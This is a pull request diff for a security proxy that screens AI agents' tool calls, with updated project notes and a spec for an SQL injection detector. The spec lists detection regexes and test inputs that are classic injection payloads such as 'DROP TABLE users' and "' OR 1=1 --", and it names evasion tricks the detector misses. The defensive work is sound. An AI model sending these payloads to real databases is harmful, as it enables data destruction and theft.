### PR TITLE
feat: implement security detectors #21-#26

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -49,14 +49,14 @@ Agent → Parser → Detectors → Rule Engine → Decision (allow/block) → To
 | `audit.py` | Async SQLite writer with SHA-256 hash chaining (stub) |
 | `cli.py` | Click CLI: `init` (stub), `start` (hardened — env var override, `--verbose`, startup banner, error handling), `logs` (stub) — **implemented** |
 
-### Detectors (`src/agentgate/detectors/`) — all stubs
+### Detectors (`src/agentgate/detectors/`)
 
-- `path_traversal.py` — `../` and absolute path detection
-- `sql_injection.py` — Destructive SQL patterns (DROP, DELETE, UNION)
-- `command_injection.py` — Shell metacharacters (`;`, `&&`, `|`, backticks, `$()`)
-- `ssrf.py` — Private/loopback IP detection
-- `secrets.py` — AWS keys, tokens, passwords in params
-- `chain.py` — Sequential attack pattern matching
+- `sql_injection.py` — Destructive SQL patterns (DROP, DELETE, UNION SELECT, tautologies, stacked queries) — **implemented**
+- `path_traversal.py` — `../` and absolute path detection (stub)
+- `command_injection.py` — Shell metacharacters (`;`, `&&`, `|`, backticks, `$()`) (stub)
+- `ssrf.py` — Private/loopback IP detection (stub)
+- `secrets.py` — AWS keys, tokens, passwords in params (stub)
+- `chain.py` — Sequential attack pattern matching (stub)
 
 ### Policy Language (YAML)
 
@@ -78,6 +78,7 @@ Four rule types: `tool_allow`, `tool_block`, `param_rule`, `chain_rule`. See `ag
 - `tests/test_proxy.py` — 5 integration tests for the stdio proxy
 - `tests/test_proxy_policy.py` — 8 integration tests for proxy + policy engine wiring (allow, block, passthrough, error format, mixed decisions)
 - `tests/test_integration.py` — 6 PR1 integration tests (blocklist precedence, CLI entry point, golden path policy, latency, stress, fixture validation)
+- `tests/test_detectors/test_sql_injection.py` — 16 SQL injection detector tests (7 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_cli.py` — 7 CLI tests (CliRunner for arg validation, subprocess for banner/error handling)
 - `tests/conftest.py` — Shared fixtures: `echo_server_cmd`, `proxy_process`, `proxy_with_policy`, `make_tool_call`, `compiled_policy_from_yaml`, `sample_policy`, `minimal_policy`
 - `tests/helpers/echo_mcp_server.py` — Minimal MCP server for proxy tests (no Node.js dependency)

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -51,6 +51,7 @@ Agent → Parser → Detectors → Rule Engine → Decision (allow/block) → To
 
 ### Detectors (`src/agentgate/detectors/`)
 
+- `_util.py` — Shared `extract_strings()` helper: recursively walks dicts, lists (including nested lists), and extracts all `(key_path, string_value)` pairs — **implemented**
 - `sql_injection.py` — Destructive SQL patterns (DROP, DELETE, UNION SELECT, tautologies, stacked queries) — **implemented**
 - `path_traversal.py` — Traversal sequences (`../`, encoded variants), sensitive absolute paths, null byte injection — **implemented**
 - `command_injection.py` — Shell metacharacters (`;`, `&&`, `|`, backticks, `$()`) with context-aware matching — **implemented**
@@ -78,11 +79,11 @@ Four rule types: `tool_allow`, `tool_block`, `param_rule`, `chain_rule`. See `ag
 - `tests/test_proxy.py` — 5 integration tests for the stdio proxy
 - `tests/test_proxy_policy.py` — 9 integration tests for proxy + policy engine wiring (allow, block, passthrough, error format, mixed decisions, detector blocking)
 - `tests/test_integration.py` — 6 PR1 integration tests (blocklist precedence, CLI entry point, golden path policy, latency, stress, fixture validation)
-- `tests/test_detectors/test_sql_injection.py` — 16 SQL injection detector tests (7 positive, 7 negative, 2 edge cases; sync, no I/O)
+- `tests/test_detectors/test_sql_injection.py` — 20 SQL injection detector tests (7 positive, 7 negative, 2 edge cases + 4 additional coverage; sync, no I/O)
 - `tests/test_detectors/test_path_traversal.py` — 17 path traversal detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_command_injection.py` — 17 command injection detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_ssrf.py` — 17 SSRF detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
-- `tests/test_detectors/test_secrets.py` — 17 secrets detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
+- `tests/test_detectors/test_secrets.py` — 19 secrets detector tests (8 positive, 7 negative, 2 edge cases + 2 additional coverage; sync, no I/O)
 - `tests/test_detectors/test_registry.py` — 8 detector pipeline tests (run_all wiring, enable/disable, multi-detector; sync, no I/O)
 - `tests/test_cli.py` — 7 CLI tests (CliRunner for arg validation, subprocess for banner/error handling)
 - `tests/conftest.py` — Shared fixtures: `echo_server_cmd`, `proxy_process`, `proxy_with_policy`, `make_tool_call`, `compiled_policy_from_yaml`, `sample_policy`, `minimal_policy`

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -54,7 +54,7 @@ Agent → Parser → Detectors → Rule Engine → Decision (allow/block) → To
 - `sql_injection.py` — Destructive SQL patterns (DROP, DELETE, UNION SELECT, tautologies, stacked queries) — **implemented**
 - `path_traversal.py` — Traversal sequences (`../`, encoded variants), sensitive absolute paths, null byte injection — **implemented**
 - `command_injection.py` — Shell metacharacters (`;`, `&&`, `|`, backticks, `$()`) with context-aware matching — **implemented**
-- `ssrf.py` — Private/loopback IP detection (stub)
+- `ssrf.py` — Private/loopback/link-local/reserved IP detection in URLs and bare IPs via `ipaddress` stdlib — **implemented**
 - `secrets.py` — AWS keys, tokens, passwords in params (stub)
 - `chain.py` — Sequential attack pattern matching (stub)
 
@@ -81,6 +81,7 @@ Four rule types: `tool_allow`, `tool_block`, `param_rule`, `chain_rule`. See `ag
 - `tests/test_detectors/test_sql_injection.py` — 16 SQL injection detector tests (7 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_path_traversal.py` — 17 path traversal detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_command_injection.py` — 17 command injection detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
+- `tests/test_detectors/test_ssrf.py` — 17 SSRF detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_cli.py` — 7 CLI tests (CliRunner for arg validation, subprocess for banner/error handling)
 - `tests/conftest.py` — Shared fixtures: `echo_server_cmd`, `proxy_process`, `proxy_with_policy`, `make_tool_call`, `compiled_policy_from_yaml`, `sample_policy`, `minimal_policy`
 - `tests/helpers/echo_mcp_server.py` — Minimal MCP server for proxy tests (no Node.js dependency)

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -52,7 +52,7 @@ Agent → Parser → Detectors → Rule Engine → Decision (allow/block) → To
 ### Detectors (`src/agentgate/detectors/`)
 
 - `sql_injection.py` — Destructive SQL patterns (DROP, DELETE, UNION SELECT, tautologies, stacked queries) — **implemented**
-- `path_traversal.py` — `../` and absolute path detection (stub)
+- `path_traversal.py` — Traversal sequences (`../`, encoded variants), sensitive absolute paths, null byte injection — **implemented**
 - `command_injection.py` — Shell metacharacters (`;`, `&&`, `|`, backticks, `$()`) (stub)
 - `ssrf.py` — Private/loopback IP detection (stub)
 - `secrets.py` — AWS keys, tokens, passwords in params (stub)
@@ -79,6 +79,7 @@ Four rule types: `tool_allow`, `tool_block`, `param_rule`, `chain_rule`. See `ag
 - `tests/test_proxy_policy.py` — 8 integration tests for proxy + policy engine wiring (allow, block, passthrough, error format, mixed decisions)
 - `tests/test_integration.py` — 6 PR1 integration tests (blocklist precedence, CLI entry point, golden path policy, latency, stress, fixture validation)
 - `tests/test_detectors/test_sql_injection.py` — 16 SQL injection detector tests (7 positive, 7 negative, 2 edge cases; sync, no I/O)
+- `tests/test_detectors/test_path_traversal.py` — 17 path traversal detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_cli.py` — 7 CLI tests (CliRunner for arg validation, subprocess for banner/error handling)
 - `tests/conftest.py` — Shared fixtures: `echo_server_cmd`, `proxy_process`, `proxy_with_policy`, `make_tool_call`, `compiled_policy_from_yaml`, `sample_policy`, `minimal_policy`
 - `tests/helpers/echo_mcp_server.py` — Minimal MCP server for proxy tests (no Node.js dependency)

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -43,7 +43,7 @@ Agent → Parser → Detectors → Rule Engine → Decision (allow/block) → To
 | `models.py` | Pydantic data contracts (ToolCall, Decision, PolicyConfig, rules) — **implemented** |
 | `parser.py` | JSON-RPC message parsing (`ParsedMessage`, `parse_message()`, `build_error_response()`) — **implemented** |
 | `policy.py` | YAML policy loader & regex compilation (`load_policy()`, `compile_regexes()`, `load_and_compile()`, `PolicyLoadError`, `CompiledPolicy`) — **implemented** |
-| `engine.py` | Top-to-bottom rule evaluation (`evaluate()` — tool_block, tool_allow, default decision) — **implemented** |
+| `engine.py` | Top-to-bottom rule evaluation (`evaluate()` — detectors, tool_block, tool_allow, default decision) — **implemented** |
 | `proxy.py` | Stdio MCP proxy — LSP-framed bidirectional relay with policy interception (`read_message`, `write_message`, `_intercepting_relay`, `StdioProxy`) — **implemented** |
 | `session.py` | Sliding-window deque of recent calls for chain detection (stub) |
 | `audit.py` | Async SQLite writer with SHA-256 hash chaining (stub) |
@@ -67,22 +67,23 @@ Four rule types: `tool_allow`, `tool_block`, `param_rule`, `chain_rule`. See `ag
 - `src/agentgate/models.py` — Core Pydantic contracts (fully implemented)
 - `src/agentgate/parser.py` — JSON-RPC parser: classifies messages by kind, extracts `ToolCall` from `tools/call` requests (fully implemented)
 - `src/agentgate/policy.py` — YAML policy loader: two-phase load (parse → compile), `PolicyLoadError` exception, `CompiledPolicy` dataclass with pre-compiled regex map (fully implemented)
-- `src/agentgate/engine.py` — Rule engine: `evaluate()` checks tool_block, tool_allow, and default decision with correct precedence (fully implemented, steps 1/4/5 deferred)
+- `src/agentgate/engine.py` — Rule engine: `evaluate()` checks detectors (Step 1), tool_block, tool_allow, and default decision with correct precedence (fully implemented, steps 4/5 deferred)
 - `src/agentgate/proxy.py` — Stdio proxy with policy interception: `_intercepting_relay` parses tool calls, evaluates against policy, blocks or forwards (fully implemented)
 - `agentgate.yaml.example` — Golden-path policy demonstrating all features
 - `docs/mvp-spec.md` — Frozen MVP specification with success criteria and evaluation plan
 - `tests/test_parser.py` — 12 parser unit tests (sync, no I/O)
 - `tests/test_models.py` — 11 model validation tests
 - `tests/test_policy.py` — 10 policy loader tests (sync, tmp_path I/O only)
-- `tests/test_engine.py` — 10 rule engine tests (sync, no I/O)
+- `tests/test_engine.py` — 14 rule engine tests (10 rule precedence + 4 detector integration; sync, no I/O)
 - `tests/test_proxy.py` — 5 integration tests for the stdio proxy
-- `tests/test_proxy_policy.py` — 8 integration tests for proxy + policy engine wiring (allow, block, passthrough, error format, mixed decisions)
+- `tests/test_proxy_policy.py` — 9 integration tests for proxy + policy engine wiring (allow, block, passthrough, error format, mixed decisions, detector blocking)
 - `tests/test_integration.py` — 6 PR1 integration tests (blocklist precedence, CLI entry point, golden path policy, latency, stress, fixture validation)
 - `tests/test_detectors/test_sql_injection.py` — 16 SQL injection detector tests (7 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_path_traversal.py` — 17 path traversal detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_command_injection.py` — 17 command injection detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_ssrf.py` — 17 SSRF detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_secrets.py` — 17 secrets detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
+- `tests/test_detectors/test_registry.py` — 8 detector pipeline tests (run_all wiring, enable/disable, multi-detector; sync, no I/O)
 - `tests/test_cli.py` — 7 CLI tests (CliRunner for arg validation, subprocess for banner/error handling)
 - `tests/conftest.py` — Shared fixtures: `echo_server_cmd`, `proxy_process`, `proxy_with_policy`, `make_tool_call`, `compiled_policy_from_yaml`, `sample_policy`, `minimal_policy`
 - `tests/helpers/echo_mcp_server.py` — Minimal MCP server for proxy tests (no Node.js dependency)

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -55,7 +55,7 @@ Agent → Parser → Detectors → Rule Engine → Decision (allow/block) → To
 - `path_traversal.py` — Traversal sequences (`../`, encoded variants), sensitive absolute paths, null byte injection — **implemented**
 - `command_injection.py` — Shell metacharacters (`;`, `&&`, `|`, backticks, `$()`) with context-aware matching — **implemented**
 - `ssrf.py` — Private/loopback/link-local/reserved IP detection in URLs and bare IPs via `ipaddress` stdlib — **implemented**
-- `secrets.py` — AWS keys, tokens, passwords in params (stub)
+- `secrets.py` — AWS keys, GitHub tokens, PEM private keys, passwords, Slack/Stripe/Bearer tokens via exact-format regex — **implemented**
 - `chain.py` — Sequential attack pattern matching (stub)
 
 ### Policy Language (YAML)
@@ -82,6 +82,7 @@ Four rule types: `tool_allow`, `tool_block`, `param_rule`, `chain_rule`. See `ag
 - `tests/test_detectors/test_path_traversal.py` — 17 path traversal detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_command_injection.py` — 17 command injection detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_ssrf.py` — 17 SSRF detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
+- `tests/test_detectors/test_secrets.py` — 17 secrets detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_cli.py` — 7 CLI tests (CliRunner for arg validation, subprocess for banner/error handling)
 - `tests/conftest.py` — Shared fixtures: `echo_server_cmd`, `proxy_process`, `proxy_with_policy`, `make_tool_call`, `compiled_policy_from_yaml`, `sample_policy`, `minimal_policy`
 - `tests/helpers/echo_mcp_server.py` — Minimal MCP server for proxy tests (no Node.js dependency)

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -53,7 +53,7 @@ Agent → Parser → Detectors → Rule Engine → Decision (allow/block) → To
 
 - `sql_injection.py` — Destructive SQL patterns (DROP, DELETE, UNION SELECT, tautologies, stacked queries) — **implemented**
 - `path_traversal.py` — Traversal sequences (`../`, encoded variants), sensitive absolute paths, null byte injection — **implemented**
-- `command_injection.py` — Shell metacharacters (`;`, `&&`, `|`, backticks, `$()`) (stub)
+- `command_injection.py` — Shell metacharacters (`;`, `&&`, `|`, backticks, `$()`) with context-aware matching — **implemented**
 - `ssrf.py` — Private/loopback IP detection (stub)
 - `secrets.py` — AWS keys, tokens, passwords in params (stub)
 - `chain.py` — Sequential attack pattern matching (stub)
@@ -80,6 +80,7 @@ Four rule types: `tool_allow`, `tool_block`, `param_rule`, `chain_rule`. See `ag
 - `tests/test_integration.py` — 6 PR1 integration tests (blocklist precedence, CLI entry point, golden path policy, latency, stress, fixture validation)
 - `tests/test_detectors/test_sql_injection.py` — 16 SQL injection detector tests (7 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_detectors/test_path_traversal.py` — 17 path traversal detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
+- `tests/test_detectors/test_command_injection.py` — 17 command injection detector tests (8 positive, 7 negative, 2 edge cases; sync, no I/O)
 - `tests/test_cli.py` — 7 CLI tests (CliRunner for arg validation, subprocess for banner/error handling)
 - `tests/conftest.py` — Shared fixtures: `echo_server_cmd`, `proxy_process`, `proxy_with_policy`, `make_tool_call`, `compiled_policy_from_yaml`, `sample_policy`, `minimal_policy`
 - `tests/helpers/echo_mcp_server.py` — Minimal MCP server for proxy tests (no Node.js dependency)

--- a/docs/issue-21-sql-injection-detector-spec.md
+++ b/docs/issue-21-sql-injection-detector-spec.md
@@ -1,0 +1,330 @@
+# Issue #21: Implement SQL Injection Detector
+
+**Status:** Implementation-ready  
+**Milestone:** PR2 — Policy Engine + Detectors + Audit  
+**Depends on:** Nothing (parallel with #22–#25; uses only `models.py`)  
+**Blocks:** #26 (wire detectors into engine)  
+**Target file:** `src/agentgate/detectors/sql_injection.py`  
+**Test file:** `tests/test_detectors/test_sql_injection.py`  
+**Estimated effort:** 1.5–2 hours  
+**Ref:** MVP Spec Section 3 (Minimum rule/detector types), Section 11 Risk 2 (false positives), Section 12 A5
+
+---
+
+## 1. Objective
+
+Implement a SQL injection detector that scans all string-typed values in a tool call's `arguments` dict for destructive SQL patterns. The detector must catch real injection payloads (DROP, DELETE, TRUNCATE, UNION SELECT, tautology attacks) while producing zero false positives on benign content that happens to contain SQL-like words (e.g., `"SELECT committee"`, `"drop the meeting notes"`, `"The DELETE key is broken"`).
+
+The detector is a pure function. `ToolCall` in, `DetectorResult` out. No I/O, no async, no state, no side effects. It runs in the detector pipeline before the rule engine, and a match short-circuits to `block`.
+
+---
+
+## 2. Scope
+
+### In scope
+
+- `detect(tool_call: ToolCall) -> DetectorResult` function in `src/agentgate/detectors/sql_injection.py`
+- Recursive scan of all string values in `tool_call.arguments` (including nested dicts/lists)
+- Detection of destructive SQL patterns only (see Section 4)
+- Case-insensitive matching
+- 7 positive test cases, 7 negative test cases (exceeds the 5+/5+ minimum)
+
+### Out of scope
+
+- Read-only SQL injection (`SELECT`-only without destructive combinations) — v1 enhancement
+- Encoded/obfuscated SQL (hex encoding, Unicode normalization tricks, comment-based evasion `/**/`) — v1 enhancement
+- Detection in non-string parameter values (integers, booleans) — not meaningful for SQL injection
+- Wiring the detector into the engine pipeline (Issue #26)
+- Any I/O, async, or state
+
+---
+
+## 3. Technical Decisions
+
+### Decision 1: Scan all string values recursively, not just top-level params
+
+**Choice:** Walk `tool_call.arguments` recursively. For every value that is a `str`, run the pattern check. For dicts, recurse into values. For lists, recurse into elements. Ignore non-string leaf values.
+
+**Rationale:** Tool call arguments can be nested. A tool might accept `{"query": {"sql": "DROP TABLE users"}}` or `{"commands": ["DROP TABLE users"]}`. Scanning only top-level string values would miss these. The recursion adds ~5 lines and eliminates a class of bypasses.
+
+### Decision 2: Two-tier detection — destructive keywords + injection indicators
+
+**Choice:** The detector uses two independent detection tiers. A match on EITHER tier triggers detection.
+
+- **Tier 1 — Destructive statements:** Standalone destructive SQL keywords/phrases in a context that looks like SQL (word-boundary-delimited, with structural SQL syntax nearby).
+- **Tier 2 — Classic injection indicators:** Patterns that are unambiguous injection artifacts regardless of destructive keywords (tautologies, comment terminators, stacked queries with semicolons).
+
+**Rationale:** Tier 1 catches `DROP TABLE users`, `DELETE FROM accounts`, `TRUNCATE TABLE sessions`. Tier 2 catches `' OR 1=1 --`, `'; --`, `UNION SELECT password FROM users`. Together they cover the OWASP SQL injection top patterns without flagging benign English text.
+
+### Decision 3: Word-boundary matching to avoid false positives on English prose
+
+**Choice:** All regex patterns use word boundaries (`\b`) to avoid matching SQL keywords embedded in English words or sentences.
+
+**Rationale:** `"The SELECT committee met on Tuesday"` contains "SELECT" but is not SQL. `"Please drop the meeting notes in the folder"` contains "drop" but is not SQL. Word boundaries alone are necessary but not sufficient — we also require structural SQL context (see patterns below). The combination of word boundaries + SQL structural context eliminates false positives from natural language.
+
+### Decision 4: Case-insensitive matching with `re.IGNORECASE`
+
+**Choice:** All patterns are compiled with `re.IGNORECASE`.
+
+**Rationale:** SQL keywords are case-insensitive. Attackers commonly mix case (`DrOp TaBlE`) to evade naive detectors. Case-insensitive matching catches this with zero additional complexity.
+
+### Decision 5: Return the first matching pattern's detail, not all matches
+
+**Choice:** On first match, return `DetectorResult(matched=True, detector_name="sql_injection", detail="...")` immediately. Don't scan remaining patterns.
+
+**Rationale:** The detector pipeline short-circuits on any detector match. There's no benefit to finding all matches — one is enough to block. Early return is faster and simpler.
+
+### Decision 6: No dependency beyond `models.py` and stdlib `re`
+
+**Choice:** `sql_injection.py` imports only `ToolCall`, `DetectorResult` from `models.py` and `re` from stdlib.
+
+**Rationale:** Leaf module. Same pattern as every other detector. No circular dependencies.
+
+---
+
+## 4. Detection Patterns
+
+### Tier 1 — Destructive SQL Statements
+
+These patterns detect SQL statements that modify or destroy data. Each requires the destructive keyword in a structural SQL context to avoid false positives on English prose.
+
+| Pattern | What it catches | Example |
+|---------|----------------|---------|
+| `DROP\s+(TABLE\|DATABASE\|INDEX\|VIEW\|SCHEMA)` | Schema/object destruction | `DROP TABLE users` |
+| `DELETE\s+FROM` | Row deletion | `DELETE FROM accounts WHERE 1=1` |
+| `TRUNCATE\s+(TABLE)?` | Table truncation | `TRUNCATE TABLE sessions` |
+| `ALTER\s+TABLE` | Schema modification | `ALTER TABLE users DROP COLUMN password` |
+| `UPDATE\s+\S+\s+SET` | Row modification (requires SET) | `UPDATE users SET role='admin'` |
+| `INSERT\s+INTO` | Data injection | `INSERT INTO admins VALUES ('attacker', 'password')` |
+| `EXEC(\|UTE)\s*\(` | Stored procedure execution | `EXEC('DROP TABLE users')` |
+
+Implementation note: Each pattern is a `re.compile(r"\b<pattern>\b", re.IGNORECASE)`. The `\b` word boundaries prevent matching inside words. The structural context (e.g., `DROP` must be followed by `TABLE`/`DATABASE`/etc.) prevents matching "drop" in natural language.
+
+### Tier 2 — Injection Indicators
+
+These patterns detect artifacts that are strong signals of SQL injection, independent of destructive keywords.
+
+| Pattern | What it catches | Example |
+|---------|----------------|---------|
+| `UNION\s+(ALL\s+)?SELECT` | Union-based data extraction | `UNION SELECT password FROM users` |
+| `OR\s+['"]?\d+['"]?\s*=\s*['"]?\d+['"]?` | Tautology injection | `OR 1=1`, `OR '1'='1'` |
+| `;\s*--` | Stacked query with comment terminator | `'; --` |
+| `;\s*(DROP\|DELETE\|INSERT\|UPDATE\|TRUNCATE\|ALTER\|EXEC)` | Stacked query with destructive follow-up | `'; DROP TABLE users` |
+
+Implementation note: The tautology pattern is intentionally narrow — it matches `OR <digit>=<digit>` with optional quotes. This catches the canonical `OR 1=1` and variants like `OR '1'='1'` without flagging legitimate uses of `OR` in English text.
+
+### What is NOT detected (explicit false-negative acceptance)
+
+| Pattern | Why not detected | Planned |
+|---------|-----------------|---------|
+| `SELECT * FROM users` (read-only) | Not destructive. Flagging SELECT statements would cause false positives on agents that legitimately query databases. | v1: optional strict mode |
+| `/**/` comment evasion (`DR/**/OP TABLE`) | Adds regex complexity. Evasion sophistication beyond MVP. | v1 |
+| Hex/Unicode encoding (`0x44524F50`) | Requires decoding layer. Out of scope for regex detector. | v1: pre-processing layer |
+| `WAITFOR DELAY` / time-based blind injection | Not destructive. Low priority for tool-call context. | v1 |
+| `INTO OUTFILE` / `LOAD_FILE` | File-based SQL injection. Uncommon in tool-call context. | v1 |
+
+---
+
+## 5. Implementation
+
+### `_extract_strings(arguments: dict) -> list[tuple[str, str]]`
+
+```
+def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
+    """Recursively extract all (key_path, string_value) pairs from arguments."""
+    results = []
+    for key, value in arguments.items():
+        path = f"{prefix}.{key}" if prefix else key
+        if isinstance(value, str):
+            results.append((path, value))
+        elif isinstance(value, dict):
+            results.extend(_extract_strings(value, path))
+        elif isinstance(value, list):
+            for i, item in enumerate(value):
+                item_path = f"{path}[{i}]"
+                if isinstance(item, str):
+                    results.append((item_path, item))
+                elif isinstance(item, dict):
+                    results.extend(_extract_strings(item, item_path))
+    return results
+```
+
+This is ~15 lines. It returns the key path for use in the `detail` message (e.g., `"SQL injection detected in param 'query': matched 'DROP TABLE'"`).
+
+### `_SQL_PATTERNS: list[tuple[re.Pattern, str]]`
+
+A module-level list of `(compiled_pattern, human_readable_label)` tuples. Compiled once at import time. The label is used in `DetectorResult.detail`.
+
+```python
+_SQL_PATTERNS: list[tuple[re.Pattern, str]] = [
+    # Tier 1: Destructive statements
+    (re.compile(r"\bDROP\s+(TABLE|DATABASE|INDEX|VIEW|SCHEMA)\b", re.I), "DROP statement"),
+    (re.compile(r"\bDELETE\s+FROM\b", re.I), "DELETE FROM statement"),
+    (re.compile(r"\bTRUNCATE\s+(TABLE\s+)?\b\w", re.I), "TRUNCATE statement"),
+    (re.compile(r"\bALTER\s+TABLE\b", re.I), "ALTER TABLE statement"),
+    (re.compile(r"\bUPDATE\s+\S+\s+SET\b", re.I), "UPDATE...SET statement"),
+    (re.compile(r"\bINSERT\s+INTO\b", re.I), "INSERT INTO statement"),
+    (re.compile(r"\bEXEC(UTE)?\s*\(", re.I), "EXEC/EXECUTE call"),
+    # Tier 2: Injection indicators
+    (re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I), "UNION SELECT"),
+    (re.compile(r"\bOR\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+['\"]?", re.I), "OR tautology"),
+    (re.compile(r";\s*--", re.I), "stacked query with comment"),
+    (re.compile(r";\s*(DROP|DELETE|INSERT|UPDATE|TRUNCATE|ALTER|EXEC)\b", re.I), "stacked destructive query"),
+]
+```
+
+### `detect(tool_call: ToolCall) -> DetectorResult`
+
+```
+def detect(tool_call: ToolCall) -> DetectorResult:
+    """Scan all string parameter values for SQL injection patterns.
+
+    Returns DetectorResult with matched=True on first pattern hit.
+    """
+    strings = _extract_strings(tool_call.arguments)
+
+    for param_path, value in strings:
+        for pattern, label in _SQL_PATTERNS:
+            if pattern.search(value):
+                return DetectorResult(
+                    matched=True,
+                    detector_name="sql_injection",
+                    detail=f"SQL injection detected in param '{param_path}': {label}",
+                )
+
+    return DetectorResult(matched=False, detector_name="sql_injection")
+```
+
+This is ~10 lines. The full module is ~60 lines including imports, patterns, and the helper.
+
+---
+
+## 6. Test Plan
+
+**File:** `tests/test_detectors/test_sql_injection.py`
+
+All tests are synchronous. No fixtures, no subprocess, no I/O. Pure function testing.
+
+### Helper
+
+```python
+def _call(arguments: dict) -> ToolCall:
+    """Build a ToolCall with the given arguments."""
+    return ToolCall(tool_name="query_db", arguments=arguments, call_id=1)
+```
+
+### Positive Cases (7) — Must Detect
+
+| # | Test name | Input | Pattern matched |
+|---|-----------|-------|-----------------|
+| P1 | `test_drop_table` | `{"query": "DROP TABLE users"}` | DROP statement |
+| P2 | `test_delete_from` | `{"query": "'; DELETE FROM accounts; --"}` | DELETE FROM + stacked query |
+| P3 | `test_union_select` | `{"query": "' UNION SELECT password FROM users --"}` | UNION SELECT |
+| P4 | `test_or_tautology` | `{"query": "' OR 1=1 --"}` | OR tautology |
+| P5 | `test_update_set` | `{"query": "UPDATE users SET role='admin' WHERE id=1"}` | UPDATE...SET |
+| P6 | `test_truncate_table` | `{"query": "TRUNCATE TABLE sessions"}` | TRUNCATE statement |
+| P7 | `test_nested_param_injection` | `{"config": {"sql": "DROP TABLE logs"}}` | DROP statement (nested) |
+
+For each: assert `result.matched is True`, `result.detector_name == "sql_injection"`, `result.detail` contains the pattern label.
+
+### Negative Cases (7) — Must NOT Detect
+
+| # | Test name | Input | Why it's benign |
+|---|-----------|-------|-----------------|
+| N1 | `test_benign_select` | `{"query": "SELECT * FROM sales WHERE quarter = 'Q4'"}` | Read-only SELECT, not destructive |
+| N2 | `test_english_prose_select` | `{"text": "The SELECT committee met on Tuesday"}` | English prose containing SQL keyword |
+| N3 | `test_english_prose_drop` | `{"text": "Please drop the meeting notes in the shared folder"}` | "drop" in natural language context |
+| N4 | `test_normal_string_params` | `{"name": "John", "email": "john@example.com"}` | No SQL at all |
+| N5 | `test_empty_arguments` | `{}` | Empty arguments |
+| N6 | `test_numeric_params_ignored` | `{"count": 42, "active": True, "path": "/data/file.txt"}` | Non-string values skipped, string has no SQL |
+| N7 | `test_benign_insert_english` | `{"text": "Insert the new section after paragraph 3"}` | "Insert" in natural language, no `INTO` follows |
+
+For each: assert `result.matched is False`, `result.detector_name == "sql_injection"`.
+
+### Edge Case Tests (2 additional)
+
+| # | Test name | Input | Expected |
+|---|-----------|-------|----------|
+| E1 | `test_case_insensitive` | `{"query": "dRoP tAbLe users"}` | `matched=True` — mixed case evasion caught |
+| E2 | `test_list_param_scanning` | `{"queries": ["SELECT 1", "DROP TABLE x"]}` | `matched=True` — second list element caught |
+
+---
+
+## 7. Acceptance Criteria
+
+| # | Criterion | Verification |
+|---|-----------|-------------|
+| AC-1 | All 7 destructive SQL patterns (DROP, DELETE FROM, TRUNCATE, ALTER TABLE, UPDATE...SET, INSERT INTO, EXEC) are detected | Tests P1–P6, E1 |
+| AC-2 | All 4 injection indicators (UNION SELECT, OR tautology, stacked + comment, stacked + destructive) are detected | Tests P2–P4 |
+| AC-3 | Benign SELECT statements are NOT flagged | Test N1 |
+| AC-4 | English prose containing SQL-like words is NOT flagged | Tests N2, N3, N7 |
+| AC-5 | Nested dict and list argument values are scanned | Tests P7, E2 |
+| AC-6 | `DetectorResult.detail` includes the param path and pattern label | All positive tests |
+| AC-7 | Zero false positives on all 7 negative cases | Tests N1–N7 |
+
+---
+
+## 8. Risks and Mitigations
+
+| Risk | Likelihood | Impact | Mitigation |
+|------|-----------|--------|------------|
+| **False positive on `INSERT INTO` in English** (e.g., "insert into the discussion") | Low | Medium | The pattern requires `INSERT\s+INTO` — two words together with SQL-structural context. "Insert into" in English is uncommon as a direct two-word phrase with a noun following immediately. If a false positive surfaces in evaluation, narrow to `INSERT\s+INTO\s+\w+\s*\(` (requiring parentheses). |
+| **Regex ReDoS on crafted input** | Very Low | Low | All patterns use `\s+` (not `\s*` in sensitive positions) and have bounded alternation. No nested quantifiers. Not a real risk for the pattern set. |
+| **Attacker uses comment evasion (`DR/**/OP`)** | Medium | Low (for MVP) | Accepted false negative. Documented in Section 4. v1 will add a comment-stripping pre-processor. |
+| **Attacker uses encoding (`0x44524F50`)** | Medium | Low (for MVP) | Accepted false negative. Documented in Section 4. v1 will add a hex/unicode decoding pre-processor. |
+| **UPDATE without SET context** ("Please update your records") | Low | Low | Pattern requires `UPDATE\s+\S+\s+SET` — the SET keyword after a table name. "Update your records" won't match because there's no SET following. |
+
+---
+
+## 9. How This Integrates with the Detector Pipeline (Issue #26 Preview)
+
+The detector registry in `detectors/__init__.py` maps `"sql_injection"` to `"agentgate.detectors.sql_injection"`. Issue #26 will:
+
+1. Import the `detect` function from each enabled detector module
